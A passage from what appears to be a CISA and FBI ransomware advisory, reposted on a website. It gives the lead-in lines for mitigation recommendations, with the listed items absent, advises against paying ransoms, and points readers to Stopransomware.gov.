files can be found on a third-party researcher’s website.[2]
Note: These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.
CISA and FBI recommend all organizations:
In addition, CISA and FBI recommend organizations apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.
If a ransomware incident occurs at your organization:
Note: CISA and FBI strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.
See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.
CISA and FBI would like to thank VMware for their contributions to this CSA.
Cookie | Duration | Description |
---|---|---|
cookielawinfo-checkbox-analytics | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics". |
cookielawinfo-checkbox-functional | 11 months | The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional". |
cookielawinfo-checkbox-necessary | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary". |
cookielawinfo-checkbox-others | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other. |
cookielawinfo-checkbox-performance | 11 months | This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance". |
viewed_cookie_policy | 11 months | The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data. |